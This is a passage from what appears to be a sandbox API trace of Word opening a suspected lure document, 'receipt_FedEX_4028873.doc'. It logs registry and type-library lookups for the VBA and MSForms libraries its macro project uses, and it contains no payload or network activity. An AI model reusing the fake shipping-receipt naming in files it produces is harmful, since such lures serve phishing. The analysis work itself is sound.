lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", lpUsedDefaultChar=0x0) returned 55 [0041.005] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned -4 [0041.005] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0 [0041.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x186740, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0041.005] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Office") returned 0x107515 [0041.005] strcpy_s (in: _Dst=0x186520, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0041.005] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x186520, cbMultiByte=7, lpWideCharStr=0x186370, cchWideChar=7 | out: lpWideCharStr="Office") returned 7 [0041.005] IUnknown:AddRef (This=0x6990960) returned 0x3 [0041.005] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="Office", lHashVal=0x107515, pfName=0x186440, pBstrLibName=0x186370 | out: pfName=0x186440*=0, pBstrLibName=0x186370) returned 0x0 [0041.005] IUnknown:Release (This=0x6990960) returned 0x2 [0041.005] IUnknown:AddRef (This=0x6992850) returned 0x3 [0041.005] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="Office", lHashVal=0x107515, pfName=0x186440, pBstrLibName=0x186370 | out: pfName=0x186440*=0, pBstrLibName=0x186370) returned 0x0 [0041.005] IUnknown:Release (This=0x6992850) returned 0x2 [0041.005] IUnknown:AddRef (This=0x6992df0) returned 0x4 [0041.005] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="Office", lHashVal=0x107515, pfName=0x186440, pBstrLibName=0x186370 | out: pfName=0x186440*=0, pBstrLibName=0x186370) returned 0x0 [0041.005] IUnknown:Release (This=0x6992df0) returned 0x3 [0041.005] IMalloc:Alloc (This=0x7feffc15380, cb=0x208) returned 0x6ad5eb0 [0041.005] wcscpy_s (in: _Destination=0x3ea0b88, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library") returned 0x0 [0041.005] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x185b20 | out: phkResult=0x185b20*=0x9ea) returned 0x0 [0041.005] RegOpenKeyW (in: hKey=0x9ea, lpSubKey="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", phkResult=0x185b18 | out: phkResult=0x185b18*=0x9ee) returned 0x0 [0041.006] RegEnumKeyW (in: hKey=0x9ee, dwIndex=0x0, lpName=0x185b48, cchName=0xa | out: lpName="2.6") returned 0x0 [0041.006] RegEnumKeyW (in: hKey=0x9ee, dwIndex=0x1, lpName=0x185b48, cchName=0xa | out: lpName="2.7") returned 0x0 [0041.006] RegEnumKeyW (in: hKey=0x9ee, dwIndex=0x2, lpName=0x185b48, cchName=0xa | out: lpName="2.8") returned 0x0 [0041.006] wcscpy_s (in: _Destination=0x185b30, _SizeInWords=0xa, _Source="2.8" | out: _Destination="2.8") returned 0x0 [0041.006] RegOpenKeyW (in: hKey=0x9ee, lpSubKey="2.8", phkResult=0x185bd8 | out: phkResult=0x185bd8*=0xa02) returned 0x0 [0041.007] _ultoa_s (in: _Val=0x0, _DstBuf=0x185b50, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0041.007] RegOpenKeyA (in: hKey=0xa02, lpSubKey="0", phkResult=0x185b40 | out: phkResult=0x185b40*=0xa0a) returned 0x0 [0041.007] RegOpenKeyW (in: hKey=0xa0a, lpSubKey="win64", phkResult=0x185b48 | out: phkResult=0x185b48*=0xa12) returned 0x0 [0041.007] RegCloseKey (hKey=0xa12) returned 0x0 [0041.008] RegCloseKey (hKey=0xa0a) returned 0x0 [0041.008] _ultow_s (in: _Value=0x0, _Buffer=0x185be0, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0041.008] RegOpenKeyW (in: hKey=0xa02, lpSubKey="0", phkResult=0x185bb8 | out: phkResult=0x185bb8*=0xa06) returned 0x0 [0041.008] RegQueryValueW (in: hKey=0xa06, lpSubKey="win64", lpData=0x185c00, lpcbData=0x185bb4 | out: lpData="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", lpcbData=0x185bb4) returned 0x0 [0041.008] wcscpy_s (in: _Destination=0x6ad5eb0, _SizeInWords=0x104, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0041.008] RegCloseKey (hKey=0xa06) returned 0x0 [0041.009] RegCloseKey (hKey=0xa02) returned 0x0 [0041.009] RegCloseKey (hKey=0x9ee) returned 0x0 [0041.009] RegCloseKey (hKey=0x9ea) returned 0x0 [0041.009] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", pptlib=0x186228*=0x0 | out: pptlib=0x186228*=0x6992580) returned 0x0 [0041.044] IUnknown:QueryInterface (in: This=0x6992580, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186028 | out: ppvObject=0x186028*=0x0) returned 0x80004002 [0041.044] ITypeLib:RemoteGetLibAttr (in: This=0x6992580, ppTLibAttr=0x186020, pDummy=0x10 | out: ppTLibAttr=0x186020, pDummy=0x10) returned 0x0 [0041.044] ITypeLib:RemoteGetDocumentation (in: This=0x6992580, index=-1, refPtrFlags=0x0, pbstrName=0x186018, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3ea0be6 | out: pbstrName=0x186018*="Microsoft Office 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3ea0be6) returned 0x0 [0041.044] StringFromGUID2 (in: rguid=0x68f0a50*(Data1=0x2df8d04c, Data2=0x5bfa, Data3=0x101b, Data4=([0]=0xbd, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0xde, [7]=0x52)), lpsz=0x186040, cchMax=39 | out: lpsz="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 39 [0041.044] _ultow_s (in: _Value=0x2, _Buffer=0x185f8a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0041.044] _ultow_s (in: _Value=0x8, _Buffer=0x185f8e, _BufferCount=0xe, _Radix=16 | out: _Buffer="8") returned 0x0 [0041.044] _ultow_s (in: _Value=0x0, _Buffer=0x185f92, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0041.044] wcscpy_s (in: _Destination=0x6a97938, _SizeInWords=0x95, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0041.044] wcscpy_s (in: _Destination=0x6a9793e, _SizeInWords=0x92, _Source="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}" | out: _Destination="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 0x0 [0041.044] wcscpy_s (in: _Destination=0x6a9798a, _SizeInWords=0x6c, _Source="#2.8#0#" | out: _Destination="#2.8#0#") returned 0x0 [0041.044] wcscpy_s (in: _Destination=0x6a97998, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0041.044] wcscpy_s (in: _Destination=0x6a97a18, _SizeInWords=0x25, _Source="Microsoft Office 16.0 Object Library" | out: _Destination="Microsoft Office 16.0 Object Library") returned 0x0 [0041.044] ITypeLib:LocalReleaseTLibAttr (This=0x6992580) returned 0x0 [0041.044] wcscpy_s (in: _Destination=0x6ad5eb0, _SizeInWords=0x104, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0041.044] IMalloc:Realloc (This=0x7feffc15380, pv=0x6bd2d20, cb=0xd00) returned 0x6c68c60 [0041.044] wcscpy_s (in: _Destination=0x6c691d0, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0041.044] IMalloc:Free (This=0x7feffc15380, pv=0x6ad5eb0) [0041.044] IUnknown:AddRef (This=0x6992580) returned 0x2 [0041.044] IUnknown:QueryInterface (in: This=0x6992580, riid=0x7fee45d85a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186288 | out: ppvObject=0x186288*=0x0) returned 0x80004002 [0041.044] ITypeLib:RemoteIsName (in: This=0x6992580, szNameBuf="Office", lHashVal=0x107515, pfName=0x186440, pBstrLibName=0x186370 | out: pfName=0x186440*=0, pBstrLibName=0x186370) returned 0x0 [0041.044] IUnknown:Release (This=0x6992580) returned 0x1 [0041.044] IMalloc:Alloc (This=0x7feffc15380, cb=0x3c) returned 0x6b84690 [0041.044] IMalloc:Free (This=0x7feffc15380, pv=0x6ad2340) [0041.044] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68eb620 [0041.044] IMalloc:Realloc (This=0x7feffc15380, pv=0x68eb620, cb=0x68) returned 0x6ad2340 [0041.044] IMalloc:Free (This=0x7feffc15380, pv=0x6b84690) [0041.045] IMalloc:Alloc (This=0x7feffc15380, cb=0x83) returned 0x6b9ee90 [0041.046] IMalloc:Free (This=0x7feffc15380, pv=0x6b9ee90) [0041.046] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x1861b0 | out: phkResult=0x1861b0*=0x9f2) returned 0x0 [0041.046] RegOpenKeyW (in: hKey=0x9f2, lpSubKey="{000204EF-0000-0000-C000-000000000046}", phkResult=0x1861a8 | out: phkResult=0x1861a8*=0x9f6) returned 0x0 [0041.046] RegEnumKeyW (in: hKey=0x9f6, dwIndex=0x0, lpName=0x1861d8, cchName=0xa | out: lpName="2.1") returned 0x0 [0041.047] RegEnumKeyW (in: hKey=0x9f6, dwIndex=0x1, lpName=0x1861d8, cchName=0xa | out: lpName="4.2") returned 0x0 [0041.047] wcscpy_s (in: _Destination=0x1861c0, _SizeInWords=0xa, _Source="4.2" | out: _Destination="4.2") returned 0x0 [0041.047] RegOpenKeyW (in: hKey=0x9f6, lpSubKey="4.2", phkResult=0x186268 | out: phkResult=0x186268*=0xa06) returned 0x0 [0041.047] _ultoa_s (in: _Val=0x9, _DstBuf=0x1861e0, _Size=0xa, _Radix=16 | out: _DstBuf="9") returned 0x0 [0041.047] RegOpenKeyA (in: hKey=0xa06, lpSubKey="9", phkResult=0x1861d0 | out: phkResult=0x1861d0*=0xa0a) returned 0x0 [0041.047] RegOpenKeyW (in: hKey=0xa0a, lpSubKey="win64", phkResult=0x1861d8 | out: phkResult=0x1861d8*=0xa0e) returned 0x0 [0041.048] RegCloseKey (hKey=0xa0e) returned 0x0 [0041.048] RegCloseKey (hKey=0xa0a) returned 0x0 [0041.048] _ultow_s (in: _Value=0x9, _Buffer=0x186270, _BufferCount=0x9, _Radix=16 | out: _Buffer="9") returned 0x0 [0041.048] RegOpenKeyW (in: hKey=0xa06, lpSubKey="9", phkResult=0x186248 | out: phkResult=0x186248*=0xa0a) returned 0x0 [0041.048] RegQueryValueW (in: hKey=0xa0a, lpSubKey="win64", lpData=0x186290, lpcbData=0x186244 | out: lpData="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL", lpcbData=0x186244) returned 0x0 [0041.049] wcscpy_s (in: _Destination=0x186540, _SizeInWords=0x104, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0041.049] RegCloseKey (hKey=0xa0a) returned 0x0 [0041.049] RegCloseKey (hKey=0xa06) returned 0x0 [0041.049] RegCloseKey (hKey=0x9f6) returned 0x0 [0041.049] RegCloseKey (hKey=0x9f2) returned 0x0 [0041.049] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x1861b0 | out: phkResult=0x1861b0*=0x9f2) returned 0x0 [0041.049] RegOpenKeyW (in: hKey=0x9f2, lpSubKey="{00020905-0000-0000-C000-000000000046}", phkResult=0x1861a8 | out: phkResult=0x1861a8*=0xa02) returned 0x0 [0041.050] RegEnumKeyW (in: hKey=0xa02, dwIndex=0x0, lpName=0x1861d8, cchName=0xa | out: lpName="8.7") returned 0x0 [0041.050] wcscpy_s (in: _Destination=0x1861c0, _SizeInWords=0xa, _Source="8.7" | out: _Destination="8.7") returned 0x0 [0041.050] RegOpenKeyW (in: hKey=0xa02, lpSubKey="8.7", phkResult=0x186268 | out: phkResult=0x186268*=0xa0a) returned 0x0 [0041.050] _ultoa_s (in: _Val=0x0, _DstBuf=0x1861e0, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0041.050] RegOpenKeyA (in: hKey=0xa0a, lpSubKey="0", phkResult=0x1861d0 | out: phkResult=0x1861d0*=0xa12) returned 0x0 [0041.051] RegOpenKeyW (in: hKey=0xa12, lpSubKey="win64", phkResult=0x1861d8 | out: phkResult=0x1861d8*=0xa1a) returned 0x0 [0041.051] RegCloseKey (hKey=0xa1a) returned 0x0 [0041.051] RegCloseKey (hKey=0xa12) returned 0x0 [0041.051] _ultow_s (in: _Value=0x0, _Buffer=0x186270, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0041.051] RegOpenKeyW (in: hKey=0xa0a, lpSubKey="0", phkResult=0x186248 | out: phkResult=0x186248*=0xa0e) returned 0x0 [0041.051] RegQueryValueW (in: hKey=0xa0e, lpSubKey="win64", lpData=0x186290, lpcbData=0x186244 | out: lpData="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", lpcbData=0x186244) returned 0x0 [0041.052] wcscpy_s (in: _Destination=0x186540, _SizeInWords=0x104, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0041.052] RegCloseKey (hKey=0xa0e) returned 0x0 [0041.052] RegCloseKey (hKey=0xa0a) returned 0x0 [0041.052] RegCloseKey (hKey=0xa02) returned 0x0 [0041.052] RegCloseKey (hKey=0x9f2) returned 0x0 [0041.052] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x1861b0 | out: phkResult=0x1861b0*=0x9f2) returned 0x0 [0041.052] RegOpenKeyW (in: hKey=0x9f2, lpSubKey="{00020430-0000-0000-C000-000000000046}", phkResult=0x1861a8 | out: phkResult=0x1861a8*=0xa02) returned 0x0 [0041.053] RegEnumKeyW (in: hKey=0xa02, dwIndex=0x0, lpName=0x1861d8, cchName=0xa | out: lpName="1.0") returned 0x0 [0041.053] RegEnumKeyW (in: hKey=0xa02, dwIndex=0x1, lpName=0x1861d8, cchName=0xa | out: lpName="2.0") returned 0x0 [0041.053] wcscpy_s (in: _Destination=0x1861c0, _SizeInWords=0xa, _Source="2.0" | out: _Destination="2.0") returned 0x0 [0041.053] RegOpenKeyW (in: hKey=0xa02, lpSubKey="2.0", phkResult=0x186268 | out: phkResult=0x186268*=0x9f6) returned 0x0 [0041.053] _ultoa_s (in: _Val=0x0, _DstBuf=0x1861e0, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0041.053] RegOpenKeyA (in: hKey=0x9f6, lpSubKey="0", phkResult=0x1861d0 | out: phkResult=0x1861d0*=0xa0a) returned 0x0 [0041.053] RegOpenKeyW (in: hKey=0xa0a, lpSubKey="win64", phkResult=0x1861d8 | out: phkResult=0x1861d8*=0xa06) returned 0x0 [0041.061] RegCloseKey (hKey=0xa06) returned 0x0 [0041.061] RegCloseKey (hKey=0xa0a) returned 0x0 [0041.061] _ultow_s (in: _Value=0x0, _Buffer=0x186270, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0041.061] RegOpenKeyW (in: hKey=0x9f6, lpSubKey="0", phkResult=0x186248 | out: phkResult=0x186248*=0xa0a) returned 0x0 [0041.061] RegQueryValueW (in: hKey=0xa0a, lpSubKey="win64", lpData=0x186290, lpcbData=0x186244 | out: lpData="C:\\Windows\\system32\\stdole2.tlb", lpcbData=0x186244) returned 0x0 [0041.062] wcscpy_s (in: _Destination=0x186540, _SizeInWords=0x104, _Source="C:\\Windows\\system32\\stdole2.tlb" | out: _Destination="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0041.062] RegCloseKey (hKey=0xa0a) returned 0x0 [0041.062] RegCloseKey (hKey=0x9f6) returned 0x0 [0041.062] RegCloseKey (hKey=0xa02) returned 0x0 [0041.062] RegCloseKey (hKey=0x9f2) returned 0x0 [0041.063] _wfullpath (in: _Buffer=0x186540, _Path="Normal", _BufferCount=0x104 | out: _Buffer="C:\\Users\\aETAdzjz\\Desktop\\Normal") returned="C:\\Users\\aETAdzjz\\Desktop\\Normal" [0041.063] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x1861b0 | out: phkResult=0x1861b0*=0x9f2) returned 0x0 [0041.063] RegOpenKeyW (in: hKey=0x9f2, lpSubKey="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", phkResult=0x1861a8 | out: phkResult=0x1861a8*=0x9f6) returned 0x0 [0041.063] RegEnumKeyW (in: hKey=0x9f6, dwIndex=0x0, lpName=0x1861d8, cchName=0xa | out: lpName="2.6") returned 0x0 [0041.064] RegEnumKeyW (in: hKey=0x9f6, dwIndex=0x1, lpName=0x1861d8, cchName=0xa | out: lpName="2.7") returned 0x0 [0041.064] RegEnumKeyW (in: hKey=0x9f6, dwIndex=0x2, lpName=0x1861d8, cchName=0xa | out: lpName="2.8") returned 0x0 [0041.064] wcscpy_s (in: _Destination=0x1861c0, _SizeInWords=0xa, _Source="2.8" | out: _Destination="2.8") returned 0x0 [0041.064] RegOpenKeyW (in: hKey=0x9f6, lpSubKey="2.8", phkResult=0x186268 | out: phkResult=0x186268*=0xa06) returned 0x0 [0041.064] _ultoa_s (in: _Val=0x0, _DstBuf=0x1861e0, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0041.064] RegOpenKeyA (in: hKey=0xa06, lpSubKey="0", phkResult=0x1861d0 | out: phkResult=0x1861d0*=0xa12) returned 0x0 [0041.064] RegOpenKeyW (in: hKey=0xa12, lpSubKey="win64", phkResult=0x1861d8 | out: phkResult=0x1861d8*=0xa1a) returned 0x0 [0041.065] RegCloseKey (hKey=0xa1a) returned 0x0 [0041.065] RegCloseKey (hKey=0xa12) returned 0x0 [0041.065] _ultow_s (in: _Value=0x0, _Buffer=0x186270, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0041.065] RegOpenKeyW (in: hKey=0xa06, lpSubKey="0", phkResult=0x186248 | out: phkResult=0x186248*=0xa0e) returned 0x0 [0041.065] RegQueryValueW (in: hKey=0xa0e, lpSubKey="win64", lpData=0x186290, lpcbData=0x186244 | out: lpData="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", lpcbData=0x186244) returned 0x0 [0041.066] wcscpy_s (in: _Destination=0x186540, _SizeInWords=0x104, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0041.066] RegCloseKey (hKey=0xa0e) returned 0x0 [0041.066] RegCloseKey (hKey=0xa06) returned 0x0 [0041.066] RegCloseKey (hKey=0x9f6) returned 0x0 [0041.066] RegCloseKey (hKey=0x9f2) returned 0x0 [0041.066] wcsncpy_s (in: _Destination=0x6c1dcb8, _SizeInWords=0x70, _Source="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\WINDOWS\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library", _MaxCount=0x30 | out: _Destination="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#") returned 0x0 [0041.066] wcscpy_s (in: _Destination=0x6c1dd18, _SizeInWords=0x40, _Source="C:\\WINDOWS\\system32\\FM20.DLL" | out: _Destination="C:\\WINDOWS\\system32\\FM20.DLL") returned 0x0 [0041.066] wcscpy_s (in: _Destination=0x6c1dd50, _SizeInWords=0x24, _Source="#Microsoft Forms 2.0 Object Library" | out: _Destination="#Microsoft Forms 2.0 Object Library") returned 0x0 [0041.066] wcscpy_s (in: _Destination=0x6c690a0, _SizeInWords=0x70, _Source="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\WINDOWS\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library" | out: _Destination="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\WINDOWS\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library") returned 0x0 [0041.066] wcsncpy_s (in: _Destination=0x186450, _SizeInWords=0x108, _Source="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\WINDOWS\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\WINDOWS\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library") returned 0x0 [0041.066] CharLowerBuffW (in: lpsz="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\WINDOWS\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library", cchLength=0x6f | out: lpsz="*\\g{0d452ee1-e08f-101a-852e-02608c4d0bb4}#2.0#0#c:\\windows\\system32\\fm20.dll#microsoft forms 2.0 object library") returned 0x6f [0041.066] IMalloc:Alloc (This=0x7feffc15380, cb=0xe0) returned 0x6c0c0b0 [0041.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{0d452ee1-e08f-101a-852e-02608c4d0bb4}#2.0#0#c:\\windows\\system32\\fm20.dll#microsoft forms 2.0 object library", cchWideChar=112, lpMultiByteStr=0x6c0c0b0, cbMultiByte=224, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{0d452ee1-e08f-101a-852e-02608c4d0bb4}#2.0#0#c:\\windows\\system32\\fm20.dll#microsoft forms 2.0 object library", lpUsedDefaultChar=0x0) returned 112 [0041.067] IMalloc:Free (This=0x7feffc15380, pv=0x6c0c0b0) [0041.067] wcscpy_s (in: _Destination=0x6bd39a0, _SizeInWords=0x70, _Source="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\WINDOWS\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library" | out: _Destination="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\WINDOWS\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library") returned 0x0 [0041.067] wcsncpy_s (in: _Destination=0x186490, _SizeInWords=0x108, _Source="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\WINDOWS\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\WINDOWS\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library") returned 0x0 [0041.067] CharLowerBuffW (in: lpsz="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\WINDOWS\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library", cchLength=0x6f | out: lpsz="*\\g{0d452ee1-e08f-101a-852e-02608c4d0bb4}#2.0#0#c:\\windows\\system32\\fm20.dll#microsoft forms 2.0 object library") returned 0x6f [0041.067] IMalloc:Alloc (This=0x7feffc15380, cb=0xe0) returned 0x6c0c0b0 [0041.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{0d452ee1-e08f-101a-852e-02608c4d0bb4}#2.0#0#c:\\windows\\system32\\fm20.dll#microsoft forms 2.0 object library", cchWideChar=112, lpMultiByteStr=0x6c0c0b0, cbMultiByte=224, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{0d452ee1-e08f-101a-852e-02608c4d0bb4}#2.0#0#c:\\windows\\system32\\fm20.dll#microsoft forms 2.0 object library", lpUsedDefaultChar=0x0) returned 112 [0041.067] IMalloc:Free (This=0x7feffc15380, pv=0x6c0c0b0) [0041.067] wcsncpy_s (in: _Destination=0x186450, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0x0 [0041.067] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", cchLength=0x36 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc") returned 0x36 [0041.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", cchWideChar=55, lpMultiByteStr=0x186380, cbMultiByte=110, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", lpUsedDefaultChar=0x0) returned 55 [0041.067] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned -4 [0041.067] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0 [0041.067] wcscpy_s (in: _Destination=0x6c69300, _SizeInWords=0x84, _Source="*\\G{F56CEE21-65E9-483A-A24D-7EF213EC6933}#2.0#0#C:\\DOCUME~1\\9335~1\\LOCALS~1\\Temp\\VBE\\MSForms.exd#Microsoft Forms 2.0 Object Library" | out: _Destination="*\\G{F56CEE21-65E9-483A-A24D-7EF213EC6933}#2.0#0#C:\\DOCUME~1\\9335~1\\LOCALS~1\\Temp\\VBE\\MSForms.exd#Microsoft Forms 2.0 Object Library") returned 0x0 [0041.067] IMalloc:Alloc (This=0x7feffc15380, cb=0x208) returned 0x6ad5eb0 [0041.067] wcscpy_s (in: _Destination=0x6c1dcb8, _SizeInWords=0x70, _Source="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\WINDOWS\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library" | out: _Destination="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\WINDOWS\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library") returned 0x0 [0041.067] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x186040 | out: phkResult=0x186040*=0x9f2) returned 0x0 [0041.067] RegOpenKeyW (in: hKey=0x9f2, lpSubKey="{0D452EE1-E08F-101A-852E-02608C4D0BB4}", phkResult=0x186038 | out: phkResult=0x186038*=0xa02) returned 0x0 [0041.068] RegEnumKeyW (in: hKey=0xa02, dwIndex=0x0, lpName=0x186068, cchName=0xa | out: lpName="2.0") returned 